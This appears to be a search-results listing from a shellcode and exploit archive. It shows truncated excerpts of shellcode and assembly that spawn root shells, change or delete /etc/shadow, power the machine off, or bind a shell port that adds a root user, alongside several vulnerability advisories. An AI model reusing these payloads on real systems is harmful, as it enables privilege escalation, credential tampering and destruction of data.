1131 matches found
Linux/x86 - chmod 0777 /etc/shadow obfuscated 84 bytes
Linux/x86 - chmod 0777 /etc/shadow obfuscated 84 bytes. Shellcode exploit for linx86 platform / Linux x86 - execve chmod 0777 /etc/shadow Obfuscated version - 84 bytes Original: http://shell-storm.org/shellcode/files/shellcode-828.php Author: xmgv Details:...
Linux MIPS execve 36 bytes
Linux MIPS execve 36 bytes. Shellcode exploit for linux platform Exploit Title: 36byte Linux MIPS execve Date: 2015 - 1 - 20 Exploit Author: Sanguine Vendor Homepage: http://sangu1ne.tistory.com/ include / Sanguine@debian-mipsel:/leaveret cat MIPS36bsc.s .section .text .globl start .set noreorder...
linux/x86 Run /usr/bin/python | setreuid(),execve() - 54 Bytes
Exploit Title: Shellcode Linux x86 Run /usr/bin/python | setreuid,execve Date: 31/7/2014 Exploit Author: Ali Razmjoo Tested on: kali-linux-1.0.4-i386 3.7-trunk-686-pae 1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux / Ali Razmjoo , email protected Shellcode Linux x86 Run /usr/bin/python | setreuid,exec...
Linux x86 - Socket Re-use Shellcode 50 bytes
Linux x86 - Socket Re-use Shellcode 50 bytes. CVE-2014-4943. Shellcode exploit for linx86 platform / Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes Made using sockfd trick + dup20,0, dup20,1, dup20,2 + execve /bin/sh Thanks: Charles Stevenson, ipv, 3LRVS research team gcc -o...
[Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh, 0, 0 vars - 30 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 start: 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0, pc 805e: 300a adds r0, 10 8060: 9001 str r0, sp, 4 806...
XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (3)
No description provided by source. source: http://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment...
Linux 2.4 Kernel execve() System Call Race Condition Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8042/info A race condition vulnerability has been discovered in the Linux execve system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the...
sco/x86 execve("/bin/sh", ..., NULL); 43 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve/bin/sh, ..., NULL; / include sys/types.h include stdio.h char scode = \x31\xc9 // xor %ecx,%ecx \x89\xe3 // mov %esp,%ebx \x68\xd0\x8c\x97\xff // push $0xff978cd0 \x68\xd0\x9d\x96\x91...
linux/x86 execve /bin/sh setreuid(12,12) 50 bytes
No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / \x29\xc0 / subl %eax, %eax / \xb0\x47 / movb $71, %al / \x29\xdb / subl %ebx, %ebx / / Here's the GI...
BSD 4.2 fingerd buffer overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2/info fingerd is a remote user information server that implements the protocol defined in RFC742. There exists a buffer overflow in finderd that allows a remote attacker to execute any local binaries. finderd reads input...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes
No description provided by source. / Linux/x86 execve/bin/sh, /bin/sh, NULL - 25 bytes - [email protected] / char shellcode = \x31\xc0 // xor %eax, %eax \x50 // push %eax \x68\x2f\x2f\x73\x68 // push $0x68732f2f \x68\x2f\x62\x69\x6e // push $0x6e69622f \x89\xe3 // mov %esp, %ebx \x50 // push %eax...
14 Bytes execve("a->/bin/sh") Local-only Shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 17.04.2010 [email protected] Promhyl Studies :: http://promhyl.oz.pl Subgroup: PRekambr Name: 14 bytes execvea-/bin/sh local-only shellcode Platform: Linux x86 execvea, 0, 0; $ ln -s /bin/sh a $ gcc...
55 bytes SLoc-DoS shellcode by Magnefikko
No description provided by source. include stdio.h include string.h / by Magnefikko 14.04.2010 [email protected] Promhyl Studies :: http://promhyl.oz.pl Subgroup: PRekambr Name: 55 bytes SLoc-DoS shellcode Platform: Linux x86 unlink/etc/shadow; execvepoweroff, 0, 0; gcc -Wl,-z,execstack...
Linux - setuid(0) & execve("/sbin/poweroff -f")
No description provided by source. include stdio.h / linux/x86 ; setuid0 & execve/sbin/poweroff -f 47 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 16:40:16 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others! / int main char shellcode...
linux/x86 bindport 8000 & add user with root access 225+ bytes
No description provided by source. ; ; Title : Bindport TCP/8000 & execve add user with access root ; os : Linux x86 ; size : 225+ bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ...
Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
No description provided by source. / Title: Solaris/x86 - execve/bin/sh,/bin/sh,NULL - 27 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan Date: 2010-05-19 Tested: SunOS opensolaris 5.11 snv111b i86pc i386 i86pc...
linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes
No description provided by source. / Linux/x86 setuid0 + setgid0 + execve/bin/sh, /bin/sh, NULL - 37 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x6a\x2e // push $0x2e \x58 // pop %eax \x53 // push %ebx...
solaris/x86 setuid(0), execve(//bin/sh); exit(0) NULL Free 39 bytes
No description provided by source. / ; sm4x 2008 ; setuid0, execve'/bin/sh', '/bin/sh', 0, ; 39 bytes NizzULL free you know... ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; quick port to drop root sh - ; - SunOS is pwnij global start start: xor eax, eax ; --- setuid0 push eax push eax mov a...
Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes
No description provided by source. / Linux/SuperH - sh4 - setuid0 ; execve/bin/sh, NULL, NULL - 27 bytes Tested on debian-sh4 2.6.32-5-sh7751r by Jonathan Salwan - twitter: @jonathansalwan 400054: 17 e3 mov 23,r3 400056: 4a 24 xor r4,r4 400058: 0b c3 trapa 11 40005a: 3a 23 xor r3,r3 40005c: 0b e3...
execve of /bin/sh after setreuid(0,0)
No description provided by source. / $Id: execve-setreuid.c,v 1.1 2001/05/02 18:10:52 raptor Exp $ execve-setreuid.c v1.0 - shellcode for Linux/i386 Copyright c 2001 Raptor [email protected] This shellcode does an execve of /bin/sh after a setreuid0, 0, then exits. / / ASM Code ; setreuid0...